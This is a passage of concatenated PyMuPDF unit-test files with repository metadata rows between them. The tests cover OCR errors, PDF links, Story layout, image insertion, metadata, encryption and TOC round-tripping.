        if pymupdf.mupdf_version_tuple >= (1, 24):
            e_expected = 'code=3: OCR initialisation failed'
            if platform.system() == 'OpenBSD':
                # 2023-12-12: For some reason the SWIG catch code only catches
                # the exception as FzErrorBase.
                e_expected_type = pymupdf.mupdf.FzErrorBase
                print(f'OpenBSD workaround - expecting FzErrorBase, not FzErrorLibrary.')
            else:
                e_expected_type = pymupdf.mupdf.FzErrorLibrary
        else:
            e_expected = 'code=2: OCR initialisation failed'
            e_expected_type = None
    else:
        # classic.
        e_expected = 'OCR initialisation failed'
        e_expected_type = None
    tessdata_prefix = os.environ.get('TESSDATA_PREFIX')
    if tessdata_prefix:
        # Real tessdata available: OCR must simply succeed.
        tp = page.get_textpage_ocr(full=True)
        print(f'test_tesseract(): page.get_textpage_ocr() succeeded')
    else:
        # Bogus tessdata path: OCR init must fail with the expected error.
        try:
            tp = page.get_textpage_ocr(full=True, tessdata='/foo/bar')
        except Exception as e:
            e_text = str(e)
            print(f'Received exception as expected.')
            print(f'{type(e)=}')
            print(f'{e_text=}')
            assert e_text == e_expected, f'Unexpected exception: {e_text!r}'
            if e_expected_type:
                print(f'{e_expected_type=}')
                assert type(e) == e_expected_type, f'{type(e)=} != {e_expected_type=}.'
        else:
            assert 0, f'Expected exception {e_expected!r}'
    rebased = hasattr(pymupdf, 'mupdf')
    if rebased:
        # The failed OCR attempt also leaves MuPDF warnings behind.
        wt = pymupdf.TOOLS.mupdf_warnings()
        if pymupdf.mupdf_version_tuple < (1, 25):
            assert wt
        else:
            assert wt == (
                    'UNHANDLED EXCEPTION!\n'
                    'library error: Tesseract initialisation failed\n'
                    'dropping unclosed output'
                    )
| 2,595 | Python | .py | 62 | 30.951613 | 89 | 0.579992 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,351 | test_named_links.py | pymupdf_PyMuPDF/tests/test_named_links.py | import pymupdf
import os
def test_2886():
    """Inserting a LINK_NAMED link must round-trip its destination name."""
    if not hasattr(pymupdf, "mupdf"):
        print(f"test_2886(): not running on classic.")
        return
    path = os.path.abspath(f"{__file__}/../../tests/resources/cython.pdf")
    doc = pymupdf.open(path)
    # "Doc-Start" is a valid named destination in this file.
    link = {"kind": pymupdf.LINK_NAMED, "name": "Doc-Start"}
    link["from"] = pymupdf.Rect(0, 0, 50, 50)
    # Insert the link in an arbitrary page & rect.
    page = doc[-1]
    page.insert_link(link)
    page = doc.reload_page(page)  # refresh MuPDF's annotation array
    inserted = page.get_links()[-1]  # the new link is appended last
    assert inserted["kind"] == pymupdf.LINK_NAMED
    assert inserted["nameddest"] == link["name"]
    assert inserted["from"] == link["from"]
def test_2922():
    """Re-insertion of an extracted named link keeps its destination.

    Link dicts from Page.get_links() lack the "name" key; insert_link()
    must fall back to the "nameddest" key instead.
    """
    if not hasattr(pymupdf, "mupdf"):
        print(f"test_2922(): not running on classic.")
        return
    path = os.path.abspath(f"{__file__}/../../tests/resources/cython.pdf")
    doc = pymupdf.open(path)
    page = doc[2]  # this page has a few links, all named
    original = page.get_links()[0]  # any link will do
    page.insert_link(original)  # re-insert the extracted dict
    page = doc.reload_page(page)  # ensure page updates
    duplicate = page.get_links()[-1]  # the re-inserted link comes last
    # The relevant key-values must survive the round trip.
    for key in ("nameddest", "page", "to", "from"):
        assert original[key] == duplicate[key]
def test_3301():
    """URI vs LAUNCH classification of /URI-encoded links.

    A target containing a ':' must come back as LINK_URI unless it
    explicitly starts with "file://"; other plain names are LINK_LAUNCH.
    """
    if not hasattr(pymupdf, "mupdf"):
        print(f"test_3301(): not running on classic.")
        return
    # Maps each link target to the link "kind" expected after extraction.
    text = {
        "https://www.google.de": pymupdf.LINK_URI,
        "http://www.google.de": pymupdf.LINK_URI,
        "mailto:jorj.x.mckie@outlook.de": pymupdf.LINK_URI,
        "www.wikipedia.de": pymupdf.LINK_LAUNCH,
        "awkward:resource": pymupdf.LINK_URI,
        "ftp://www.google.de": pymupdf.LINK_URI,
        "some.program": pymupdf.LINK_LAUNCH,
        "file://some.program": pymupdf.LINK_LAUNCH,
        "another.exe": pymupdf.LINK_LAUNCH,
    }
    # Insert each target as a LINK_URI link in its own stacked rectangle.
    base = pymupdf.Rect(0, 0, 50, 20)
    doc = pymupdf.open()
    page = doc.new_page()
    for i, target in enumerate(text):
        rect = base + (0, base.height * i, 0, base.height * i)
        page.insert_link({"kind": pymupdf.LINK_URI, "uri": target, "from": rect})
    # Re-cycle the PDF through memory before extracting links.
    doc = pymupdf.open("pdf", doc.write())
    page = doc[0]
    for link in page.get_links():
        # LAUNCH links report their target under 'file', URI links under 'uri'.
        target = link.get("file")
        if target is None:
            target = link["uri"]
        assert text[target] == link["kind"]
| 3,712 | Python | .py | 88 | 36.170455 | 85 | 0.632936 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,352 | test_showpdfpage.py | pymupdf_PyMuPDF/tests/test_showpdfpage.py | """
Tests:
* Convert some image to a PDF
* Insert it rotated in some rectangle of a PDF page
* Assert PDF Form XObject has been created
* Assert that image contained in inserted PDF is inside given rectangle
"""
import os
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
imgfile = os.path.join(scriptdir, "resources", "nur-ruhig.jpg")
def test_insert():
    """Insert an image-derived PDF page, rotated, into a target rectangle.

    Verifies a Form XObject is created and that the rendered image stays
    inside the target rect (1 point tolerance for rounding).
    """
    doc = pymupdf.open()
    page = doc.new_page()
    target = pymupdf.Rect(50, 50, 100, 100)
    img_doc = pymupdf.open(imgfile)
    src = pymupdf.open("pdf", img_doc.convert_to_pdf())
    xref = page.show_pdf_page(target, src, 0, rotate=-23)
    # The inserted object must be a Form XObject carrying the returned xref.
    assert page.get_images(True)[0][-1] == xref
    info = page.get_image_info()[0]
    # Rounding may deviate slightly: enlarge target by 1 pt each direction.
    assert info["bbox"] in target + (-1, -1, 1, 1)
def test_2742():
    """Show the same source page three times side by side (issue #2742)."""
    dest = pymupdf.open()
    destpage = dest.new_page(width=842, height=595)
    third = destpage.rect.width / 3
    a5 = pymupdf.Rect(0, 0, third, destpage.rect.height)
    shift = pymupdf.Rect(third, 0, third, 0)
    src = pymupdf.open(os.path.abspath(f'{__file__}/../../tests/resources/test_2742.pdf'))
    for i in range(3):
        destpage.show_pdf_page(a5 + shift * i, src, 0)
    dest.save(os.path.abspath(f'{__file__}/../../tests/test_2742-out.pdf'))
    print("The end!")
    if hasattr(pymupdf, 'mupdf'):
        # The circular-dependency warning is expected, repeated per insert.
        wt = pymupdf.TOOLS.mupdf_warnings()
        assert wt == (
            'Circular dependencies! Consider page cleaning.\n'
            '... repeated 3 times...'
        ), f'{wt=}'
| 2,009 | Python | .py | 44 | 40.136364 | 90 | 0.655385 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,353 | test_story.py | pymupdf_PyMuPDF/tests/test_story.py | import pymupdf
import os
import textwrap
def test_story():
    """Lay out a Story using a custom @font-face CSS and write it to PDF."""
    otf = os.path.abspath(f'{__file__}/../resources/PragmaticaC.otf')
    # 2023-12-06: latest mupdf throws exception if path uses back-slashes.
    otf = otf.replace('\\', '/')
    CSS = f"""
    @font-face {{font-family: test; src: url({otf});}}
    """
    HTML = """
    <p style="font-family: test;color: blue">We shall meet again at a place where there is no darkness.</p>
    """
    mediabox = pymupdf.paper_rect("letter")
    where = mediabox + (36, 36, -36, -36)
    # Without user_css the output would not use the custom font.
    story = pymupdf.Story(HTML, user_css=CSS, archive=pymupdf.Archive("."))
    writer = pymupdf.DocumentWriter("output.pdf")
    more = 1
    while more:
        device = writer.begin_page(mediabox)
        more, _ = story.place(where)
        story.draw(device)
        writer.end_page()
    writer.close()
def test_2753():
    """page-break-before/after CSS must each produce a two-page document."""
    def rectfn(rect_num, filled):
        # One fixed layout rect per page.
        return pymupdf.Rect(0, 0, 200, 200), pymupdf.Rect(50, 50, 100, 100), None

    def make_pdf(html, path_out):
        document = pymupdf.Story(html=html).write_with_links(rectfn)
        print(f'test_2753(): Writing to: {path_out=}.')
        document.save(path_out)
        return document

    html_before = textwrap.dedent('''
            <p>Before</p>
            <p style="page-break-before: always;"></p>
            <p>After</p>
            ''')
    html_after = textwrap.dedent('''
            <p>Before</p>
            <p style="page-break-after: always;"></p>
            <p>After</p>
            ''')
    doc_before = make_pdf(
            html_before,
            os.path.abspath(f'{__file__}/../../tests/test_2753-out-before.pdf'),
            )
    doc_after = make_pdf(
            html_after,
            os.path.abspath(f'{__file__}/../../tests/test_2753-out-after.pdf'),
            )
    assert len(doc_before) == 2
    assert len(doc_after) == 2
springer_html = '''
<article>
<aside>
<img src="springer.jpg">
<br><i>Michael Springer ist Schriftsteller und Wis­sen­schafts­publizist. Eine Sammlung seiner Einwürfe ist 2019 als Buch unter dem Titel <b>»Lauter Überraschungen. Was die Wis­senschaft weitertreibt«</b> erschienen.<br><a>www.spektrum.de/artikel/2040277</a></i>
</aside>
<h1>SPRINGERS EINWÜRFE: INTIME VERBINDUNGEN</h1>
<h2>Wieso kann unsereins so vieles, was eine Maus nicht kann? Unser Gehirn ist nicht bloß größer, sondern vor allem überraschend vertrackt verdrahtet.</h2>
<p>Der Heilige Gral der Neu­ro­wis­sen­schaft ist die komplette Kartierung des menschlichen Gehirns – die ge­treue Ab­bildung des Ge­strüpps der Nervenzellen mit den baum­för­mi­gen Ver­ästel­ungen der aus ihnen sprie­ßen­den Den­dri­ten und den viel län­ge­ren Axo­nen, wel­che oft der Sig­nal­über­tragung von einem Sin­nes­or­gan oder zu einer Mus­kel­fa­ser die­nen. Zum Gesamtbild gehören die winzigen Knötchen auf den Dendriten; dort sitzen die Synapsen. Das sind Kontakt- und Schalt­stel­len, leb­haf­te Ver­bin­dungen zu anderen Neuronen.</p>
<p>Dieses Dickicht bis zur Ebene einzelner Zel­len zu durchforsten und es räumlich dar­zu­stel­len, ist eine gigantische Aufgabe, die bis vor Kurzem utopisch anmuten musste. Neu­er­dings vermag der junge For­schungs­zweig der Konnektomik (von Englisch: con­nect für ver­bin­den) das Zusammenspiel der Neurone immer besser zu verstehen. Das gelingt mit dem Einsatz dreidimensionaler Elek­tro­nen­mik­ros­ko­pie. Aus Dünn­schicht­auf­nah­men von zerebralen Ge­we­be­pro­ben lassen sich plastische Bil­der ganzer Zellverbände zu­sam­men­setzen.</p>
<p>Da frisches menschliches Hirn­ge­we­be nicht ohne Wei­te­res zu­gäng­lich ist – in der Regel nur nach chirurgischen Eingriffen an Epi­lep­sie­pa­tien­ten –, hält die Maus als Mo­dell­or­ga­nis­mus her. Die evolutionäre Ver­wandt­schaft von Mensch und Nager macht die Wahl plau­sibel. Vor allem das Team um Moritz Helmstaedter am Max-Planck-Institut (MPI) für Hirnforschung in Frankfurt hat in den ver­gangenen Jahren Expertise bei der kon­nek­tomischen Analyse entwickelt.</p>
<p>Aber steckt in unserem Kopf bloß ein auf die tausendfache Neu­ro­nen­an­zahl auf­ge­bläh­tes Mäu­se­hirn? Oder ist menschliches Ner­ven­ge­we­be viel­leicht doch anders gestrickt? Zur Beantwortung dieser Frage unternahm die MPI-Gruppe einen detaillierten Vergleich von Maus, Makake und Mensch (Science 377, abo0924, 2022).</p>
<p>Menschliches Gewebe stammte diesmal nicht von Epileptikern, son­dern von zwei wegen Hirntumoren operierten Patienten. Die For­scher wollten damit vermeiden, dass die oft jahrelange Behandlung mit An­ti­epi­lep­ti­ka das Bild der synaptischen Verknüpfungen trübte. Sie verglichen die Proben mit denen eines Makaken und von fünf Mäusen.</p>
<p>Einerseits ergaben sich – einmal ab­ge­se­hen von den ganz of­fen­sicht­li­chen quan­titativen Unterschieden wie Hirngröße und Neu­ro­nen­anzahl – recht gute Über­ein­stim­mun­gen, die somit den Gebrauch von Tier­modellen recht­fer­ti­gen. Doch in einem Punkt erlebte das MPI-Team eine echte Über­raschung.</p>
<p>Gewisse Nervenzellen, die so genannten In­ter­neurone, zeichnen sich dadurch aus, dass sie aus­schließ­lich mit anderen Ner­ven­zel­len in­ter­agieren. Solche »Zwi­schen­neu­rone« mit meist kurzen Axonen sind nicht primär für das Verarbeiten externer Reize oder das Aus­lösen körperlicher Reaktionen zuständig; sie be­schäf­ti­gen sich bloß mit der Ver­stär­kung oder Dämpfung interner Signale.</p>
<p>Just dieser Neuronentyp ist nun bei Makaken und Menschen nicht nur mehr als doppelt so häufig wie bei Mäusen, sondern obendrein be­son­ders intensiv untereinander ver­flochten. Die meisten Interneurone kop­peln sich fast ausschließlich an ihresgleichen. Dadurch wirkt sich ihr konnektomisches Ge­wicht ver­gleichs­weise zehnmal so stark aus.</p>
<p>Vermutlich ist eine derart mit sich selbst be­schäf­tigte Sig­nal­ver­ar­beitung die Vor­be­ding­ung für ge­stei­gerte Hirn­leis­tungen. Um einen Ver­gleich mit verhältnismäßig pri­mi­ti­ver Tech­nik zu wagen: Bei küns­tli­chen neu­ro­na­len Netzen – Algorithmen nach dem Vor­bild verknüpfter Nervenzellen – ge­nü­gen schon ein, zwei so genannte ver­bor­ge­ne Schich­ten von selbst­be­züg­li­chen Schaltstellen zwischen Input und Output-Ebene, um die ver­blüf­fen­den Erfolge der künstlichen Intel­ligenz her­vor­zu­bringen.</p>
</article>
'''
def test_fit_springer():
    """Exercise Story.fit_scale/fit_height/fit_width against pinned results."""
    if not hasattr(pymupdf, 'mupdf'):
        print(f'test_fit_springer(): not running on classic.')
        return
    verbose = 0
    story = pymupdf.Story(springer_html)
    def check(call, expected):
        '''
        Checks that eval(call) returned parameter=expected. Also creates PDF
        using path that contains `call` in its leafname,
        '''
        # eval() of a literal string built below - test-internal, not untrusted.
        fit_result = eval(call)
        print(f'test_fit_springer(): {call=} => {fit_result=}.')
        if expected is None:
            # The requested fit is expected to be impossible.
            assert not fit_result.big_enough
        else:
            document = story.write_with_links(lambda rectnum, filled: (fit_result.rect, fit_result.rect, None))
            path = os.path.abspath(f'{__file__}/../../tests/test_fit_springer_{call}_{fit_result.parameter=}_{fit_result.rect=}.pdf')
            document.save(path)
            print(f'Have saved document to {path}.')
            assert abs(fit_result.parameter-expected) < 0.001, f'{expected=} {fit_result.parameter=}'
    check(f'story.fit_scale(pymupdf.Rect(0, 0, 200, 200), scale_min=1, verbose={verbose})', 3.685728073120117)
    check(f'story.fit_scale(pymupdf.Rect(0, 0, 595, 842), scale_min=1, verbose={verbose})', 1.0174560546875)
    check(f'story.fit_scale(pymupdf.Rect(0, 0, 300, 421), scale_min=1, verbose={verbose})', 2.02752685546875)
    check(f'story.fit_scale(pymupdf.Rect(0, 0, 600, 900), scale_min=1, scale_max=1, verbose={verbose})', 1)
    check(f'story.fit_height(20, verbose={verbose})', 10782.3291015625)
    check(f'story.fit_height(200, verbose={verbose})', 2437.4990234375)
    check(f'story.fit_height(2000, verbose={verbose})', 450.2998046875)
    check(f'story.fit_height(5000, verbose={verbose})', 378.2998046875)
    check(f'story.fit_height(5500, verbose={verbose})', 378.2998046875)
    check(f'story.fit_width(3000, verbose={verbose})', 167.30859375)
    check(f'story.fit_width(2000, verbose={verbose})', 239.595703125)
    check(f'story.fit_width(1000, verbose={verbose})', 510.85546875)
    check(f'story.fit_width(500, verbose={verbose})', 1622.1272945404053)
    check(f'story.fit_width(400, verbose={verbose})', 2837.507724761963)
    check(f'story.fit_width(300, width_max=200000, verbose={verbose})', None)
    check(f'story.fit_width(200, width_max=200000, verbose={verbose})', None)
    # Run without verbose to check no calls to log() - checked by assert.
    check('story.fit_scale(pymupdf.Rect(0, 0, 600, 900), scale_min=1, scale_max=1, verbose=0)', 1)
    check('story.fit_scale(pymupdf.Rect(0, 0, 300, 421), scale_min=1, verbose=0)', 2.02752685546875)
def test_write_stabilized_with_links():
    """Build a document with a self-referencing TOC via write_stabilized_with_links.

    The content function regenerates a contents list from the positions
    of the previous iteration; the result must contain exactly one
    external link (when running on the rebased implementation).
    """
    def rectfn(rect_num, filled):
        '''
        We return one rect per page.
        '''
        rect = pymupdf.Rect(10, 20, 290, 380)
        mediabox = pymupdf.Rect(0, 0, 300, 400)
        #print(f'rectfn(): rect_num={rect_num} filled={filled}')
        return mediabox, rect, None
    def contentfn(positions):
        # Build HTML: a contents list generated from heading positions,
        # followed by fixed body sections with internal and external links.
        ret = ''
        ret += textwrap.dedent('''
                <!DOCTYPE html>
                <body>
                <h2>Contents</h2>
                <ul>
                ''')
        for position in positions:
            if position.heading and (position.open_close & 1):
                text = position.text if position.text else ''
                if position.id:
                    ret += f'    <li><a href="#{position.id}">{text}</a>'
                else:
                    ret += f'    <li>{text}'
                ret += f' page={position.page_num}\n'
        ret += '</ul>\n'
        ret += textwrap.dedent(f'''
                <h1>First section</h1>
                <p>Contents of first section.
                <ul>
                <li>External <a href="https://artifex.com/">link to https://artifex.com/</a>.
                <li><a href="#idtest">Link to IDTEST</a>.
                <li><a href="#nametest">Link to NAMETEST</a>.
                </ul>
                <h1>Second section</h1>
                <p>Contents of second section.
                <h2>Second section first subsection</h2>
                <p>Contents of second section first subsection.
                <p id="idtest">IDTEST
                <h1>Third section</h1>
                <p>Contents of third section.
                <p><a name="nametest">NAMETEST</a>.
                </body>
                ''')
        return ret.strip()
    document = pymupdf.Story.write_stabilized_with_links(contentfn, rectfn)
    # Check links.
    links = list()
    for page in document:
        links += page.get_links()
    print(f'{len(links)=}.')
    external_links = dict()
    for i, link in enumerate(links):
        print(f'    {i}: {link=}')
        if link.get('kind') == pymupdf.LINK_URI:
            uri = link['uri']
            external_links.setdefault(uri, 0)
            external_links[uri] += 1
    # Check there is one external link.
    print(f'{external_links=}')
    if hasattr(pymupdf, 'mupdf'):
        assert len(external_links) == 1
        assert 'https://artifex.com/' in external_links
    out_path = __file__.replace('.py', '.pdf')
    document.save(out_path)
def test_archive_creation():
    """Story must accept both an Archive instance and a plain path string."""
    pymupdf.Story(archive=pymupdf.Archive('.'))
    pymupdf.Story(archive='.')
| 12,865 | Python | .py | 181 | 61.314917 | 736 | 0.659003 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,354 | test_insertimage.py | pymupdf_PyMuPDF/tests/test_insertimage.py | """
* Insert same image with different rotations in two places of a page.
* Extract bboxes and transformation matrices
* Assert image locations are inside given rectangles
"""
import json
import os
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
imgfile = os.path.join(scriptdir, "resources", "nur-ruhig.jpg")
def test_insert():
    """Insert the same image twice (plain and rotated); verify bboxes."""
    doc = pymupdf.open()
    page = doc.new_page()
    rect_a = pymupdf.Rect(50, 50, 100, 100)
    rect_b = pymupdf.Rect(50, 150, 200, 400)
    page.insert_image(rect_a, filename=imgfile)
    page.insert_image(rect_b, filename=imgfile, rotate=270)
    infos = page.get_image_info()
    assert len(infos) == 2
    # Each displayed image must lie inside its insertion rectangle.
    assert pymupdf.Rect(infos[0]["bbox"]) in rect_a
    assert pymupdf.Rect(infos[1]["bbox"]) in rect_b
def test_compress():
    """Rebuild a PDF from page pixmaps and save with maximum compression."""
    src = pymupdf.open(f'{scriptdir}/resources/2.pdf')
    out = pymupdf.open()
    for page in src:
        pix = page.get_pixmap(colorspace=pymupdf.csRGB, dpi=72, annots=False)
        new_page = out.new_page(-1)
        new_page.insert_image(rect=new_page.bound(), pixmap=pix)
    out.save(
        f'{scriptdir}/resources/2.pdf.compress.pdf',
        garbage=3,
        deflate=True,
        deflate_images=True,
        deflate_fonts=True,
        pretty=True,
    )
def test_3087():
    """Insert extracted images together with soft masks (issue #3087)."""
    path = os.path.abspath(f'{__file__}/../../tests/resources/test_3087.pdf')
    doc = pymupdf.open(path)
    page = doc[0]
    print(page.get_images())
    # NOTE(review): base and mask are both extracted from xref 5 here -
    # possibly intentional (image used as its own mask); the second round
    # below uses distinct xrefs 5 and 6. Confirm before "fixing".
    base = doc.extract_image(5)["image"]
    mask = doc.extract_image(5)["image"]
    page = doc.new_page()
    page.insert_image(page.rect, stream=base, mask=mask)
    doc = pymupdf.open(path)
    page = doc[0]
    print(page.get_images())
    base = doc.extract_image(5)["image"]
    mask = doc.extract_image(6)["image"]
    page = doc.new_page()
    page.insert_image(page.rect, stream=base, mask=mask)
| 2,020 | Python | .py | 58 | 28.448276 | 77 | 0.635149 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,355 | test_imagebbox.py | pymupdf_PyMuPDF/tests/test_imagebbox.py | """
Ensure equality of bboxes computed via
* page.get_image_bbox()
* page.get_image_info()
* page.get_bboxlog()
"""
import os
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "image-file1.pdf")
image = os.path.join(scriptdir, "resources", "img-transparent.png")
doc = pymupdf.open(filename)
def test_image_bbox():
    """Bboxes from get_image_bbox() must match those from get_image_info().

    Bug fix: the original asserted the match flag only once, after the
    loop over images, so only the LAST image was actually verified; now
    every image info entry must have a matching computed bbox.
    """
    page = doc[0]
    imglist = page.get_images(True)
    bbox_list = [page.get_image_bbox(item, transform=False) for item in imglist]
    for im in page.get_image_info(xrefs=True):
        bbox1 = im["bbox"]
        # An image matches when some computed bbox is (nearly) identical.
        assert any((bbox2 - bbox1).norm() < 1e-4 for bbox2 in bbox_list)
def test_bboxlog():
    """A single inserted image yields one 'fill-image' bbox log entry."""
    document = pymupdf.open()
    page = document.new_page()
    xref = page.insert_image(page.rect, filename=image)
    infos = page.get_image_info(xrefs=True)
    assert len(infos) == 1
    assert infos[0]["xref"] == xref
    log = page.get_bboxlog()
    assert len(log) == 1
    kind, bbox = log[0]
    assert kind == "fill-image"
    assert bbox == infos[0]["bbox"]
| 1,291 | Python | .py | 42 | 25.571429 | 68 | 0.633655 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,356 | test_metadata.py | pymupdf_PyMuPDF/tests/test_metadata.py | """
1. Read metadata and compare with stored expected result.
2. Erase metadata and assert object has indeed been deleted.
"""
import json
import os
import sys
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "001003ED.pdf")
metafile = os.path.join(scriptdir, "resources", "metadata.txt")
doc = pymupdf.open(filename)
def test_metadata():
    """Document metadata must equal the stored expected JSON text.

    Bug fix: the expected file was read via an unclosed
    ``open(metafile).read()``, leaking the file handle; a context
    manager closes it deterministically.
    """
    with open(metafile) as f:
        assert json.dumps(doc.metadata) == f.read()
def test_erase_meta():
    """After clearing metadata, the trailer's /Info must be gone or null."""
    doc.set_metadata({})
    info_is_null = doc.xref_get_key(-1, "Info")[1] == "null"
    info_missing = "Info" not in doc.xref_get_keys(-1)
    assert info_missing or info_is_null
def test_3237():
    """Metadata repr before/after set_metadata({}) matches pinned bytes."""
    filename = os.path.abspath(f'{__file__}/../../tests/resources/001003ED.pdf')
    with pymupdf.open(filename) as doc:
        # We need to explicitly encode in utf8 on windows.
        metadata1 = doc.metadata
        metadata1 = repr(metadata1).encode('utf8')
        doc.set_metadata({})
        metadata2 = doc.metadata
        metadata2 = repr(metadata2).encode('utf8')
    print(f'{metadata1=}')
    print(f'{metadata2=}')
    assert metadata1 == b'{\'format\': \'PDF 1.6\', \'title\': \'RUBRIK_Editorial_01-06.indd\', \'author\': \'Natalie Schaefer\', \'subject\': \'\', \'keywords\': \'\', \'creator\': \'\', \'producer\': \'Acrobat Distiller 7.0.5 (Windows)\', \'creationDate\': "D:20070113191400+01\'00\'", \'modDate\': "D:20070120104154+01\'00\'", \'trapped\': \'\', \'encryption\': None}'
    assert metadata2 == b"{'format': 'PDF 1.6', 'title': '', 'author': '', 'subject': '', 'keywords': '', 'creator': '', 'producer': '', 'creationDate': '', 'modDate': '', 'trapped': '', 'encryption': None}"
| 1,815 | Python | .py | 34 | 48.705882 | 375 | 0.638826 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,357 | test_crypting.py | pymupdf_PyMuPDF/tests/test_crypting.py | """
Check PDF encryption:
* make a PDF with owber and user passwords
* open and decrypt as owner or user
"""
import pymupdf
def test_encryption():
    """Round-trip an AES-256 encrypted PDF with owner and user passwords."""
    text = "some secret information"  # keep this data secret
    perm = int(
        pymupdf.PDF_PERM_ACCESSIBILITY  # always use this
        | pymupdf.PDF_PERM_PRINT  # permit printing
        | pymupdf.PDF_PERM_COPY  # permit copying
        | pymupdf.PDF_PERM_ANNOTATE  # permit annotations
    )
    doc = pymupdf.open()  # empty pdf
    doc.new_page().insert_text((50, 72), text)
    data = doc.tobytes(
        encryption=pymupdf.PDF_ENCRYPT_AES_256,  # strongest algorithm
        owner_pw="owner",
        user_pw="user",
        permissions=perm,
    )
    doc.close()
    # Owner password: return code 4, document fully decrypted.
    doc = pymupdf.open("pdf", data)
    assert doc.needs_pass
    assert doc.is_encrypted
    assert doc.authenticate("owner") == 4
    assert not doc.is_encrypted
    doc.close()
    # User password: return code 2.
    doc = pymupdf.open("pdf", data)
    assert doc.authenticate("user") == 2
| 1,288 | Python | .py | 37 | 29.648649 | 69 | 0.661329 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,358 | test_object_manipulation.py | pymupdf_PyMuPDF/tests/test_object_manipulation.py | """
Check some low-level PDF object manipulations:
1. Set page rotation and compare with string in object definition.
2. Set page rotation via string manipulation and compare with result of
proper page property.
3. Read the PDF trailer and verify it has the keys "/Root", "/ID", etc.
"""
import pymupdf
import os
# Directory of this test file and shared resource locations.
scriptdir = os.path.abspath(os.path.dirname(__file__))
resources = os.path.join(scriptdir, "resources")
filename = os.path.join(resources, "001003ED.pdf")  # sample PDF used below
def test_rotation1():
    """set_rotation() must be reflected in the page's /Rotate key."""
    document = pymupdf.open()
    pg = document.new_page()
    pg.set_rotation(270)
    assert document.xref_get_key(pg.xref, "Rotate") == ("int", "270")
def test_rotation2():
    """Setting /Rotate via raw object manipulation must be seen by Page.rotation."""
    document = pymupdf.open()
    pg = document.new_page()
    document.xref_set_key(pg.xref, "Rotate", "270")
    assert pg.rotation == 270
def test_trailer():
    """Access PDF trailer information: Size matches xref length; ID/Root exist."""
    document = pymupdf.open(filename)
    _, size_value = document.xref_get_key(-1, "Size")
    assert document.xref_length() == int(size_value)
    keys = document.xref_get_keys(-1)
    assert "ID" in keys
    assert "Root" in keys
def test_valid_name():
    """Verify PDF name validation in xref_set_key for both key and value."""
    document = pymupdf.open()
    pg = document.new_page()
    # A syntactically valid key is accepted.
    document.xref_set_key(pg.xref, "Rotate", "90")
    assert pg.rotation == 90
    # A key containing white space must be rejected.
    caught = False
    try:
        document.xref_set_key(pg.xref, "my rotate", "90")
    except ValueError as exc:
        assert str(exc) == "bad 'key'"
        caught = True
    assert caught
    # Valid values: a nested key path and a PDF name literal.
    document.xref_set_key(pg.xref, "my_rotate/something", "90")
    assert document.xref_get_key(pg.xref, "my_rotate/something") == ("int", "90")
    document.xref_set_key(pg.xref, "my_rotate", "/90")
    assert document.xref_get_key(pg.xref, "my_rotate") == ("name", "/90")
    # A name value with an embedded slash must be rejected.
    caught = False
    try:
        document.xref_set_key(pg.xref, "my_rotate", "/9/0")
    except ValueError as exc:
        assert str(exc) == "bad 'value'"
        caught = True
    assert caught
| 2,314 | Python | .py | 61 | 33.196721 | 78 | 0.664732 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,359 | test_badfonts.py | pymupdf_PyMuPDF/tests/test_badfonts.py | """
Ensure we can deal with non-Latin font names.
"""
import os
import pymupdf
def test_survive_names():
    """Listing fonts with non-Latin names must not raise."""
    resource_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), "resources")
    document = pymupdf.open(os.path.join(resource_dir, "has-bad-fonts.pdf"))
    print("File '%s' uses the following fonts on page 0:" % document.name)
    for font in document.get_page_fonts(0):
        print(font)
| 396 | Python | .py | 12 | 29.416667 | 72 | 0.682415 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,360 | test_2634.py | pymupdf_PyMuPDF/tests/test_2634.py | import pymupdf
import difflib
import json
import os
import pprint
def test_2634():
    """#2634: set_toc(get_toc(simple=False)) must round-trip a document's TOC.

    The TOC of the source PDF is copied onto a fresh document; apart from
    naturally differing fields (xref numbers, collapse state) and sub-0.01
    rounding of destination points, both TOCs must be identical.
    """
    if not hasattr(pymupdf, 'mupdf'):
        # Test relies on rebased-implementation behavior; skip on classic.
        print('test_2634(): Not running on classic.')
        return
    path = os.path.abspath(f'{__file__}/../../tests/resources/test_2634.pdf')
    with pymupdf.open(path) as pdf, pymupdf.open() as new:
        new.insert_pdf(pdf)
        new.set_toc(pdf.get_toc(simple=False))
        toc_pdf = pdf.get_toc(simple=False)
        toc_new = new.get_toc(simple=False)
        def clear_xref(toc):
            '''
            Clear toc items that naturally differ.
            '''
            for item in toc:
                d = item[3]
                if 'collapse' in d:
                    d['collapse'] = 'dummy'
                if 'xref' in d:
                    d['xref'] = 'dummy'
        clear_xref(toc_pdf)
        clear_xref(toc_new)
        # Dump both TOCs and a unified diff for diagnosis on failure.
        print('toc_pdf')
        for item in toc_pdf: print(item)
        print()
        print('toc_new')
        for item in toc_new: print(item)
        toc_text_pdf = pprint.pformat(toc_pdf, indent=4).split('\n')
